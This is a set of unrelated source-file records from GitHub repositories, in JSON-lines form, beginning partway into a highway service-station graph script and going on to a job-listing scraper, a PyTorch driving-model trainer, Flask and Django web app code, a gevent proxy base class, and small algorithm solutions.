list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=200, node_color=node_colors, alpha=0.7)\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n\n # Display the plot\n plt.title(\"Graph of Nodes\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\n\n\ndef plot_points(coords):\n \"\"\"\n Plots multiple points on a graph using networkx.\n\n Parameters:\n - coords (list): A list of tuples representing the coordinates (latitude, longitude) of each point.\n\n Returns:\n - None: The function plots the points but doesn't return any value.\n \"\"\"\n # Create a graph\n G = nx.Graph()\n\n # Add nodes to the graph using coordinates as node labels\n for i, (lat, lon) in enumerate(coords):\n G.add_node(i, pos=(lon, lat)) # Use longitude as x-coordinate and latitude as y-coordinate\n\n # Extract positions of nodes for plotting\n pos = nx.get_node_attributes(G, 'pos')\n\n # Draw the graph with nodes at specified positions\n nx.draw(G, pos, with_labels=False, node_size=300, node_color='skyblue', font_size=5, font_color='black')\n\n '''# Add labels to nodes\n for i, (lat, lon) in enumerate(coords):\n plt.text(lon, lat, f'({lat}, {lon})', fontsize=8, ha='right')'''\n\n # Display the plot\n plt.title('Plotting Points on a Graph')\n plt.show()\n\n\ndef print_latlon(coords):\n #Create a graph \n g = nx.Graph()\n\n #add_nodes\n for i, (lat,lon) in enumerate(coords):\n #print(f\"nodes: {el['own_id']}, pos=({el['lat']}, {el['lon']})\")\n g.add_node(i, pos=(lat, lon))\n \n # Extract node positions\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=200, node_color='blue', alpha=0.7)\n\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n #edge_labels = nx.get_edge_attributes(g, 'weight')\n #nx.draw_networkx_edge_labels(g, pos=node_positions, edge_labels=edge_labels)\n\n # Display the plot\n plt.title(\"Graph of Nodes in France\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\n\n'''\nso guys, update time\nI implemented all funktion up to the graph creation, but one funktion isn't working correct. It is the add_service_to_highway funktion. \nMy idea is: \n1. compute the centroid of every service station and rest area (merge_are_to_point). then we have a list of coordinates.\n2. Find for every coordinate the neares \"normal\" street node and save the id in a list. (add_service_to_highway) and the list is marked_street_nodes.\nThese node should be the nodes we are working with.\n3. modify the highway(delete_usless_highway_nodes). This funktion takes every way (street) and looks for every node in they way, if it is a marked street node or a normal one. normal ones are deleted.\n4. add_own_id for easier debugging and better readibility\n5. create_edges_arry. Now that we have all the nodes we need and every has a new id, we can create the edges. Also sorts out double edges and calculates the lenght.\n6. delete_useless_street_nodes_of_nodes_array. Just for printing the graph. We want to only display the nodes we are using.\n7. display graph\n\n\nNow the add_service_to_highway funktion doesn't work how I inteded it. I don't know how, if it is a programming mistake or a mistake im my approach.\nIs there a smarter approach or do you find the mistake?\n\nOnce we fix it, we should have the graph and can start with the next tasks.\n\n'''\n\n\n\n\nfilepath_service = \"service-stations-Aquitaine.json\"\njson_data_service = load_json_data(filepath_service)\n\nfilepath_highway = \"street-Nodes-Aquitaine.json\"\njson_data_highway = load_json_data(filepath_highway)\n\n\n\n\n#nodes_... is a list of dict containing all nodes (of that type)\n#way is a list of dict containing all ways of streets or rest areas\nnodes_service, way_service = split_array_service_stations(json_data_service)\nnodes_highway, way_highway = split_array_highway(json_data_highway)\n\n#nodes_service: nodes of the edges of service sations\n# array of: {'type': 'node', 'id': 304610017, 'lat': 44.8883184, 'lon': -0.5799906}, {'type': 'node', 'id': 304610018, 'lat': 44.888388, 'lon': -0.5796747}\n#way_service: ways of the edges of service stations, ids only contain ids of nodes_service\n# array of: {'type': 'way', 'id': 1018761865, 'nodes': [9396560469, 9396560468, 9396560467, 9635617586, 9635617587, 307456719, 9396560469], 'tags': {'highway': 'services'}}\n#nodes_highway: nodes of all possible street points\n# array of: {'type': 'node', 'id': 10981442267, 'lat': 43.7195563, 'lon': -0.269957}\n#way_highway: wasy of the streets. only ontains ids of nodes_highway\n# array of {'type': 'way', 'id': 1018760500, 'nodes': [9396528101, 9396528100, 9396528099, 9396528098, 9396528097, 9396528101], 'tags': {'highway': 'services'}}\n\n\n\n#service is a list of points (lat, lon), the centroid of every service station\nservice = merge_area_to_point(way_service, nodes_service)\n\n#adds own_id proporty, to sort easier\nnodes_highway = add_own_id(nodes_highway)\n#{'type': 'node', 'id': 10981442267, 'lat': 43.7195563, 'lon': -0.269957, 'own_id': 1}\ncreate_graph(nodes_highway, [])\n\n\n#merge to nearest street node\n#marked_street_nodes are a list of nodes_highway, which were the clostest to a rest area (only a list of ids)\nmarked_street_nodes = add_service_to_highway(nodes_highway, service)\n\ncreate_graph3(nodes_highway, [], marked_street_nodes)\n\n\n#deleate all the not marked street nodes out of way_highway\n#marked_ways is array of streets. every street is an array out of nodes\nmarked_ways = []\n#junction_ids is an array of id of nodes, which aren't service stations, but rather junction nodes.\njunction_ids = []\n#for every street\nfor el in way_highway:\n #chech each point, if its a marked one, if not delete\n marked_ids = []\n for node_id in el['nodes']:\n #print(get_line(node_id, nodes_highway))\n #check if nodes are marked, if yes add to list\n junc_check = check_if_node_is_junction(node_id, nodes_highway)\n if node_id in marked_street_nodes or junc_check == 1:\n if(junc_check == 1):\n junction_ids.append(node_id)\n\n marked_ids.append(node_id)\n #reset list of nodes on the highway to only the marked ones\n if len(marked_ids) > 0:\n marked_ways.append(marked_ids) \nprint(marked_ways)\n\n'''way_highway_only_marked = []\nfor el in nodes_highway:\n if el['id'] in marked_street_nodes:\n way_highway_only_marked.append(el)\n\n#way_highway_only_marked: array of dict: {'type': 'node', 'id': 638664, 'lat': 43.3410243, 'lon': -0.3775863, 'own_id': 282}\n\n#contains the highways, but only with the marked street nodes. The street nodes which are service stations\n#way_highway_only_marked2 = delete_usless_highway_nodes(way_highway, marked_street_nodes)\n\nprint(way_highway[-5])\nprint(way_highway_only_marked2[-5])'''\n\n'''\n#create the edges with the own_ids\nedges_with_own_id = create_edges_array(nodes_highway, way_highway_only_marked)\n\n#create_graph2(nodes_highway, edges_with_own_id, service)\n#print_latlon(service)\n\n\n#list of all street nodes, which represent a rest area\nnodes_service_final = delete_useless_street_nodes_of_nodes_array(nodes_highway, marked_street_nodes)\n\ncreate_graph(nodes_service_final, edges_with_own_id)\n\n'''\n\n\n\n\n\n","repo_name":"Janus124/Applied-Algorithm-Charging-Stations","sub_path":"create-graph.py","file_name":"create-graph.py","file_ext":"py","file_size_in_byte":20512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26748129771","text":"\nimport requests # for accesing web page\nfrom bs4 import BeautifulSoup # for pulling data out of html\nimport pandas as pd # for general working with data\n# from nltk import word_tokenize # text mining / analysis\nfrom collections import Counter\nfrom nltk.corpus import stopwords\nimport re #regex\n\n# A function take jobtitle and location as arguments and return correct url for web scraping purpose\ndef searchquery(jobtitle, location):\n title = jobtitle.replace(' ', '+')\n loc = location.replace(' ', '+')\n url = 'http://www.indeed.com/jobs?q=%22'+ title +'%22&radius=50&limit=50&l='+loc\n return url\n\n# A function to take job list's url as an input and return dataframe with job titles and url to job post\ndef collect_job_list(url):\n # create empty list\n jobtitle, hreflink = [], []\n \n # get contents from the web\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'html.parser')\n \n # find the page number\n x = soup.findAll('div', {'id': 'searchCount'})[0].text.replace(',', '')\n pageN = int(x[x.find('of ')+3:])\n \n # iterate over page number \n for i in range(0, pageN, 50):\n joblisturl = url + '&start=' + str(i)\n r = requests.get(joblisturl)\n soup = BeautifulSoup(r.content, 'html.parser')\n \n # iterate over each listed job post on search result to obtain job title and link\n for data in soup.findAll('a', {'data-tn-element': 'jobTitle'}):\n if 'clk?jk=' in data.get('href'):\n hreflink.append(data.get('href'))\n jobtitle.append(data.text)\n df = pd.DataFrame({'title': jobtitle, 'link': hreflink})\n return df\n\n\n# convert the href link data in dataframe to proper url\ndef properurl(link):\n joburl = 'http://www.indeed.com/viewjob?jk=' +\\\n link[link.find('clk?jk=')+len('clk?jk='):link.find('&fccid')]\n return joburl\n \n\n# A function to take job posting's url as an input, mine text data from selected job post. \n# and return the text from the post.\ndef collect_job_data(joblink_list):\n jobdesc = []\n #iterate over href link in data frame\n for i in range(0, len(joblink_list)):\n joburl = properurl(joblink_list[i])\n \n #extracting text data from selected job posting \n r = requests.get(joburl)\n soup = BeautifulSoup(r.content, 'html.parser')\n desc = ''.join(soup.findAll('td', {'class': 'snip'})[0].text)\n desc = re.sub('[^A-Za-z0-9&]+', ' ', desc)\n jobdesc.append(desc[:desc.find('ago')].replace('\\n', ' ').lower())\n return jobdesc\n\n# A function to take str as input, split the str and count the words\ndef countword(text):\n #removing stopwords from the data\n stop = stopwords.words('english')\n \n \n nostopword = ' '.join([word for word in text.split() if word not in stop])\n #create word count list\n count = Counter(nostopword.split())\n return count\n\n# A function to take words as input and return the list of counts for the words of interest.\ndef sortlist(words, countlist):\n result= [] \n for word in words.split():\n result.append([x for x in countlist if word in x])\n return result\n\n\n\n\n\n\n ","repo_name":"ykimmate14/job_post_web_scraping","sub_path":"job_web_scraping.py","file_name":"job_web_scraping.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10066562762","text":"import os\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nfrom custom_mobilenet import CustomMobileNet\n\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nclass DriveDataset(torch.utils.data.Dataset):\n def __init__(self, root_dir, transform=None):\n temp = root_dir.split('/')\n self.root_dir = '/'.join(temp[:-1])\n self.transform = transform\n\n self.data = pd.read_csv(root_dir)\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n row = self.data.iloc[idx]\n \n # Cargar imagen RGB\n folder, file = row['filenames'].split('/')\n img_rgb_path = os.path.join(\n self.root_dir, 'Images', folder, 'rgb', file)\n img_rgb = Image.open(img_rgb_path)\n\n if self.transform:\n img_rgb = self.transform(img_rgb)\n\n # leer etiquetas de la i-ésima muestra\n throttle = row['throttle']\n steering = row['steer']\n action_left = row['action_left']\n action_right = row['action_right']\n action_forward = row['action_forward']\n no_action = row['no_action']\n \n # Crear muestra\n sample = (img_rgb,\n # Tensor de parámetros de acción.\n torch.tensor([\n float(action_left), float(action_right),\n float(action_forward), float(no_action)\n ]),\n # Tensor de etiquetas de aceleración y giro.\n torch.tensor([\n float(throttle), float(steering)\n ]))\n\n return sample\n\n\nif __name__ == '__main__':\n model = CustomMobileNet(pretrained=True)\n\n model.cuda()\n\n train_dir = 'path/to/train_dataset_final.csv'\n val_dir = 'path/to/val_dataset_final.csv'\n\n train_loader = torch.utils.data.DataLoader(\n dataset=DriveDataset(train_dir, transforms.Compose([\n transforms.Resize((224, 224), interpolation=Image.BICUBIC),\n transforms.ToTensor(),\n lambda T: T[:3]\n ])),\n batch_size=64,\n shuffle=True,\n num_workers=12,\n pin_memory=True\n )\n\n val_loader = torch.utils.data.DataLoader(\n dataset=DriveDataset(val_dir, transforms.Compose([\n transforms.Resize((224, 224), interpolation=Image.BICUBIC),\n transforms.ToTensor()\n ])),\n batch_size=64,\n shuffle=False,\n num_workers=12,\n pin_memory=True\n )\n\n criterion = nn.MSELoss().cuda()\n optimizer = torch.optim.Adam(model.parameters())\n\n losses = []\n\n # Iterar para entrenar la red\n for epoch in range(50):\n start = time.time()\n\n model.train()\n train_loss = 0\n # Definir barra de progreso interactiva\n train_progress = tqdm(enumerate(train_loader),\n desc=\"train\",\n total=len(train_loader))\n \n # Iterar por cada minibatch de 64 muestras\n for i, (X, actions, y) in train_progress:\n # Copiar los datos a la GPU\n X = X.cuda(non_blocking=True)\n actions = actions.cuda(non_blocking=True)\n y = y.cuda(non_blocking=True)\n y_hat = model(X, actions)\n \n # Calcular el error cuadrático medio para la aceleración\n loss1 = criterion(y_hat[:, 0], y[:, 0])\n # Calcular el error cuadrático medio para la dirección\n loss2 = criterion(torch.tanh(y_hat[:, 1]), y[:, 1])\n # Combinar ambos errores\n loss = (loss1 + loss2)/2\n\n # Paso de optimización\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n train_loss += float(loss.detach())\n train_progress.set_postfix(loss=(train_loss/(i+1)))\n\n model.eval()\n\n val_loss = 0\n with torch.no_grad():\n model.eval()\n val_progress = tqdm(enumerate(val_loader),\n desc=\"val\",\n total=len(val_loader))\n for i, (X, actions, y) in val_progress:\n X = X.cuda(non_blocking=True)\n actions = actions.cuda(non_blocking=True)\n y = y.cuda(non_blocking=True)\n y_hat = model(X, actions)\n\n loss1 = criterion(y_hat[:, 0], y[:, 0])\n loss2 = criterion(y_hat[:, 1], y[:, 1])\n loss = (loss1 + loss2) / 2\n\n val_loss += float(loss)\n val_progress.set_postfix(loss=(val_loss/(i+1)))\n\n end = time.time()\n\n t_loss = train_loss / len(train_loader)\n v_loss = val_loss / len(val_loader)\n print('epoch:', epoch, 'L:', t_loss, v_loss, 'Time:', end-start)\n\n torch.save(\n {\n 'epoch': epoch,\n 'arch': 'mobilenet_custom',\n 'state_dict': model.state_dict()\n },\n f'weights/mob_drive_{epoch}.pth.tar')\n losses.append([epoch, t_loss, v_loss])\n np.save('hist_drive', np.array(losses))\n","repo_name":"nubol23/thesis-document","sub_path":"codigos/apendices/drive_train.py","file_name":"drive_train.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1410920170","text":"from app import db\nfrom flask import Blueprint, request, jsonify, make_response, abort\nfrom app.models.board import Board\nfrom app.models.card import Card\nfrom .route_helper import validate_model, create_card, validate_message_length, query_sort, validate_board_data\n\nbp = Blueprint('boards', __name__, url_prefix=\"/boards\")\n\n# CREATE\n# create a board endpoint, returns 201 if successful\n@bp.route(\"\", methods=[\"POST\"])\ndef create_board():\n request_body = request.get_json()\n\n validate_board_data(request_body)\n\n new_board = Board.from_dict(request_body)\n\n db.session.add(new_board)\n db.session.commit()\n\n return jsonify({\"board\": new_board.to_dict()}), 201\n\n# READ\n# Gets all Boards and returns 200\n@bp.route(\"\", methods=[\"GET\"])\ndef read_all_boards():\n boards = Board.query.all()\n\n board_response = []\n for board in boards: \n board_response.append(board.to_dict())\n return jsonify(board_response), 200\n\n# Gets one board by board id and returns 200 if found\n@bp.route(\"/\", methods=[\"GET\"])\ndef read_one_board(board_id):\n board = validate_model(Board, board_id)\n response_body = board.to_dict()\n return jsonify(response_body), 200\n\n# Gets cards by board_id\n@bp.route(\"//cards\", methods=[\"GET\"])\ndef retrieve_cards(board_id): \n board = validate_model(Board, board_id)\n\n card_query = query_sort(board.id)\n\n cards_response = [card.to_dict() for card in card_query]\n\n return jsonify(cards_response), 200\n\n# UPDATE\n# assign cards to a board\n@bp.route(\"//cards\", methods=[\"POST\"])\ndef add_cards_to_board(board_id):\n board = validate_model(Board, board_id)\n \n request_body = request.get_json()\n validate_message_length(request_body)\n card_id = create_card(request_body, board_id)\n \n card = validate_model(Card, card_id)\n board.cards.append(card)\n \n db.session.commit()\n\n return jsonify({\"board_id\": board.id, \"card\": card.to_dict()})\n\n\n","repo_name":"lizzach/back-end-inspiration-board","sub_path":"app/board_routes.py","file_name":"board_routes.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"14237036608","text":"from app import app\nfrom flask import render_template, jsonify, flash\nfrom utils import get_all_reminders, get_one_reminder, compress\n\n@app.route('/')\ndef index():\n page_title = \"Reminder - Home\"\n \n template = render_template('index.html', page_title=page_title)\n\n return compress(template)\n\n@app.route('/r')\ndef reminders():\n count=0\n reminders = get_all_reminders()\n\n # reminder counter\n for reminder in reminders:\n if reminder['deleted'] == 0:\n count += 1\n\n page_title = \"Reminders ({}) - All Reminders\".format(count)\n \n template = render_template('reminders.html', reminders=reminders, page_title=page_title)\n\n return compress(template)\n\n@app.route('/r/')\ndef reminder(id):\n page_title=''\n reminder = get_one_reminder(id)\n\n if reminder['deleted'] == 1:\n page_title = \"Deleted\"\n else:\n page_title = \"Reminder - {0}\".format(reminder['title'])\n\n template = render_template('reminder.html', reminder=reminder, page_title=page_title)\n\n return compress(template)\n\n@app.route('/dashboard')\ndef dashboard():\n page_title = \"Reminder - Dashboard\"\n name = \"Hassan\"\n reminders = get_all_reminders()\n\n template = render_template('dashboard.html', page_title=page_title, name=name, reminders=reminders)\n\n return compress(template)","repo_name":"Suuuuuprr/Rustin-Joger-final","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39705052694","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# utf-8 中文编码\n\nfrom gevent import socket as _socket\nimport re\nimport gevent\nfrom httptool import HttpPool\nfrom gevent.lock import BoundedSemaphore\n\n\nclass UpstreamBase(object):\n u\"\"\" 特定线路 socket 模块\n\n 使用方式为创建本类实例,然后把实例当作 socket 模块即可。所有的操作都会经过 config 配置的线路。\"\"\"\n\n # 封装好的 socket 类\n socket = None\n\n def __init__(self, config):\n self.type = config.get('type', None)\n self.config = config\n\n import upstream as upstream_mod\n\n upconfig = config.get('upstream', None)\n\n if upconfig:\n uptype = upconfig.get(\"type\", None)\n if uptype is None:\n raise ConfigError(u'[配置错误] upstream 未配置 type !')\n\n Upstream = upstream_mod.get_upstream(uptype)\n if Upstream is None:\n raise ConfigError(u'[配置错误] upstream type %s 不被支持!' % uptype)\n\n self.upstream = Upstream(upconfig)\n pass\n else:\n if self.type != 'direct':\n self.upstream = upstream_mod.get_upstream('direct')({'type':'direct'})\n else:\n self.upstream = _socket\n\n self.http_pool = HttpPool(self,lock=BoundedSemaphore)\n\n def create_connection(self,address, timeout=5):\n if timeout == _socket._GLOBAL_DEFAULT_TIMEOUT:\n timeout = 10\n raise NotImplementedError()\n\n def get_display_name(self):\n return self.get_name()\n\n def get_name(self):\n return '%s-host:port' % (self.type)\n\n # http 请求处理\n # http 代理可以重写本方法\n # socks 类代理不需要处理。\n def get_http_conn(self,address):\n u\"\"\" 获得http with 连接 \"\"\"\n return self.http_pool.get_conn(address)\n\n\n\n\nclass ConfigError(ValueError):\n def __init__(self, *args, **kwargs):\n ValueError.__init__(self, *args, **kwargs)\n\nclass UpstreamError(_socket.error):\n def __init__(self, *args, **kwargs):\n _socket.error.__init__(self, *args, **kwargs)\n\nclass UpstreamLoginError(UpstreamError):\n def __init__(self, *args, **kwargs):\n _socket.error.__init__(self, *args, **kwargs)\n\nclass UpstreamProtocolError(UpstreamError):\n def __init__(self, *args, **kwargs):\n _socket.error.__init__(self, *args, **kwargs)\n\nclass UpstreamConnectError(UpstreamError):\n def __init__(self, *args, **kwargs):\n _socket.error.__init__(self, *args, **kwargs)\n\n\n\n","repo_name":"GameXG/TcpRoute","sub_path":"upstream/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"69"}
+{"seq_id":"74785394140","text":"\"\"\"\nComment Module Serializer\n\"\"\"\nfrom rest_framework import serializers\nfrom datetime import date\n\nfrom siteinfo.models import Error\nfrom cafe.models import Bartender, Cafe, MenuItem\nfrom comment.models import Comment\n\n\nclass CreateCommentSerializer(serializers.ModelSerializer):\n \"\"\"Create Comment Serializer\"\"\"\n\n class Meta:\n model = Comment\n fields = [\"item_id\", \"text\"]\n\n def validate(self, attrs):\n item_id = attrs.get(\"item_id\")\n\n user = self.context.get(\"request\").user\n menu_item = MenuItem.objects.filter(id=item_id).first()\n\n if not menu_item:\n msg = \"این آیتم وجود ندارد\"\n raise serializers.ValidationError(msg)\n cafe = menu_item.cafe\n\n is_bartender = Bartender.objects.filter(\n cafe=cafe, user=user, is_active=True\n ).exists()\n\n if user == cafe.owner or is_bartender:\n msg = \"برای خودتون میخواین کامنت بذارید ؟\"\n raise serializers.ValidationError(msg)\n\n return attrs\n\n def create(self, validated_data):\n user = self.context.get(\"request\").user\n item_id = validated_data.get(\"item_id\")\n\n try:\n menu_item = MenuItem.objects.filter(id=item_id).first()\n cafe = menu_item.cafe\n\n now_date = date.today()\n\n comment = Comment.objects.create(\n user=user,\n cafe_id=cafe.id,\n is_cafe=False,\n date=now_date,\n **validated_data\n )\n comment.save()\n return comment\n\n except Exception as e:\n Error.objects.create(\n reference=\"Comment - serializers.py - create customer comment\",\n status=str(type(e).__name__),\n description=str(e),\n )\n msg = \"مشکلی ایجاد شده\"\n raise serializers.ValidationError(msg)\n\n\nclass ResponseCommentSerializer(serializers.ModelSerializer):\n \"\"\"Response Comment Serializer\"\"\"\n\n id = serializers.IntegerField(required=True)\n # text = serializers.CharField(max_length=500, required=True)\n\n class Meta:\n model = Comment\n fields = [\"id\", \"text\"]\n\n def validate(self, attrs):\n comment_id = attrs.get(\"id\")\n user = self.context.get(\"request\").user\n try:\n comment = Comment.objects.get(id=comment_id)\n cafe = Cafe.objects.get(id=comment.cafe_id)\n is_bartender = Bartender.objects.filter(\n cafe=cafe, user=user, is_active=True\n ).exists()\n\n if not (user == cafe.owner or is_bartender):\n msg = \"جواب کامنت بقیه را نمیتوانید بدهید\"\n raise serializers.ValidationError(msg)\n except:\n msg = \"همچین کامنتی وجود ندارد\"\n raise serializers.ValidationError(msg)\n return attrs\n\n def create(self, validated_data):\n user = self.context.get(\"request\").user\n comment_id = validated_data.get(\"id\")\n text = validated_data.get(\"text\")\n\n try:\n comment = Comment.objects.get(id=comment_id)\n now_date = date.today()\n\n response = Comment.objects.create(\n user=user,\n cafe_id=comment.cafe_id,\n is_cafe=True,\n date=now_date,\n text=text,\n item_id=comment.item_id,\n )\n\n response.save()\n\n comment.response = response\n comment.save()\n\n return response\n\n except Exception as e:\n Error.objects.create(\n reference=\"Comment - serializers.py - create response comment\",\n status=str(type(e).__name__),\n description=str(e),\n )\n msg = \"مشکلی ایجاد شده\"\n raise serializers.ValidationError(msg)\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n \"\"\"Comment Serializer\"\"\"\n\n class Meta:\n model = Comment\n fields = \"__all__\"\n # read_only_fields = '__all__'\n\n def to_representation(self, instance):\n response = super().to_representation(instance)\n response[\"name\"] = instance.user.fullName\n try:\n item = MenuItem.objects.filter(id=instance.item_id).first()\n response[\"item\"] = item.title\n\n if instance.response:\n response[\"response\"] = {\n \"name\": instance.response.user.fullName,\n \"date\": instance.response.date,\n \"text\": instance.response.text,\n }\n\n except:\n None\n return response\n","repo_name":"Hamid-Ba/Iran-Cafe","sub_path":"comment/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20352205539","text":"_ = int(input())\n#inp = list(map(int,input().split()))\ntestInp = input().split(\" \")\norigInp = list(map(int,testInp))\nSorInp = list(map(int,testInp))\nSorInp.sort()\n\ngoods = 0\nrev = _-1\n\ncount = 0\nif SorInp==origInp:\n\tprint(\"yes\")\n\tprint(\"1 1\")\nelse:\n\twhile origInp[goods]==SorInp[goods]:\n\t\tgoods += 1\n\twhile origInp[rev] == SorInp[rev]:\n\t\trev -= 1\n\tif origInp[goods:rev+1] == SorInp[goods:rev+1][::-1]:\n\t\tprint(\"yes\")\n\t\tprint(1+min(goods,rev),1+max(goods,rev))\n\telse:\n\t\tprint(\"no\")","repo_name":"GarlicToothpaste/Codeforces-Solutions","sub_path":"451B/451B.py","file_name":"451B.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70197145821","text":"# import necessary packages\nimport numpy as np\nimport cv2\n\ndef process_letter(thresh,output):\t\n\t# assign the kernel size\t\n\tkernel = np.ones((2,1), np.uint8) # vertical\n\t# use closing morph operation then erode to narrow the image\t\n\ttemp_img = cv2.morphologyEx(thresh,cv2.MORPH_CLOSE,kernel,iterations=3)\n\t# temp_img = cv2.erode(thresh,kernel,iterations=2)\t\t\n\tletter_img = cv2.erode(temp_img,kernel,iterations=1)\n\t\n\t# find contours \n\t(_,contours, _) = cv2.findContours(letter_img.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\t\n\t# loop in all the contour areas\n\tfor cnt in contours:\n\t\tx,y,w,h = cv2.boundingRect(cnt)\n\t\tcv2.rectangle(output,(x-1,y-5),(x+w,y+h),(0,255,0),1)\n\n\treturn output\t\n\n\nfor i in range(1,34):\n\tpath1=\"gray_num2/num\"+str(i)+\".jpg\"\n\timage1 = cv2.imread(path1)\n\toutput1_letter = cv2.imread(path1)\n\tgray1 = cv2.cvtColor(image1, cv2.COLOR_BGR2GRAY)\n\tret1,th1 = cv2.threshold(gray1,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n\toutput1_letter = process_letter(th1,output1_letter)\n\tpath2=\"gray_num2_output/num\"+str(i)+\".jpg\"\n\tcv2.imwrite(path2, output1_letter)\t\n","repo_name":"katomaran-videoanalytics/Testing","sub_path":"layout/text_analysis.py","file_name":"text_analysis.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16103993446","text":"class Solution(object):\n def validateStackSequences(self, pushed, popped):\n \"\"\"\n :type pushed: List[int]\n :type popped: List[int]\n :rtype: bool\n \"\"\"\n if pushed == popped: return True\n size = len(pushed)\n\n stack = []\n c = 0\n for index in range(size):\n stack.append(pushed[index])\n\n while stack:\n if stack[-1] != popped[0]:\n break\n else:\n stack.pop()\n popped.pop(0)\n\n if stack == []:\n return True\n return False\n","repo_name":"Huoyanlifusu/LeetCode","sub_path":"946栈的压入弹出.py","file_name":"946栈的压入弹出.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74281746779","text":"# -*- coding: utf-8 -*-\nimport itertools\nimport time\n\nfrom django.core.validators import MinLengthValidator\nfrom django.db import models\nfrom django.db.models.signals import post_save, pre_delete, post_delete\nfrom django.urls import reverse\nfrom mptt.fields import TreeForeignKey\nfrom mptt.managers import TreeManager\nfrom mptt.models import MPTTModel\nfrom email.utils import formatdate\nfrom main.mixins.models import SitePageModel\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Post(SitePageModel):\n LIST_VIEW_HEADING = _(u'All posts')\n comments_count = models.IntegerField(_(u'Comments count'), default=0)\n\n class Meta:\n verbose_name = _(u'Post')\n verbose_name_plural = _(u'Posts')\n ordering = ('last_modified',)\n\n def get_comments(self, root=None):\n if root:\n return root.get_children()\n else:\n return Comment.tree.filter(post=self, level__lte=2)\n\n def get_comments_count(self):\n return self.comments_count\n\n @classmethod\n def get_breadcrumbs_base(cls):\n return [\n {\n 'title': cls.LIST_VIEW_HEADING,\n 'url': reverse('post-list')\n },\n ]\n\n def get_breadcrumbs(self):\n return itertools.chain(\n self.get_breadcrumbs_base(),\n [\n {\n 'title': self.title,\n 'url': self.get_absolute_url()\n }\n ]\n )\n\n @models.permalink\n def get_absolute_url(self):\n return 'post-detail', (), {'slug': self.slug}\n\n\nclass Comment(MPTTModel):\n user = models.ForeignKey('auth.User', verbose_name=_(u'User'))\n post = models.ForeignKey('Post', verbose_name=_(u'Post'))\n\n message = models.TextField(\n verbose_name=_(u'Message'),\n max_length=1000,\n validators=[MinLengthValidator(5)]\n )\n\n last_modified = models.DateTimeField(\n auto_created=True,\n auto_now=True\n )\n\n parent_comment = TreeForeignKey(\n 'self',\n verbose_name=_(u'parent comment'),\n blank=True,\n null=True\n )\n\n tree = TreeManager()\n\n def __unicode__(self):\n return _(u'From %s [%s]') % (self.user, self.get_last_modified())\n\n class Meta:\n verbose_name = _(u'Comment')\n verbose_name_plural = _(u'Comments')\n\n class MPTTMeta:\n parent_attr = 'parent_comment'\n order_insertion_by = 'last_modified'\n\n def get_last_modified(self):\n return formatdate(time.mktime(self.last_modified.timetuple()), usegmt=True)\n\n\ndef update_post(sender, instance, **kwargs):\n instance.post.comments_count = instance.post.comment_set.all().count()\n instance.post.save()\n Comment.tree.rebuild()\n\npost_save.connect(update_post, Comment)\npost_delete.connect(update_post, Comment)\n","repo_name":"Enweave/ex_strategia","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
